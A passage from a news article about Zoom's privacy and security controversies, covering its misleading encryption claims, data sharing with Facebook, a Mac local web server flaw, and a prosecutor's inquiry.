This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees of end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)
Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is current the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.
“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”
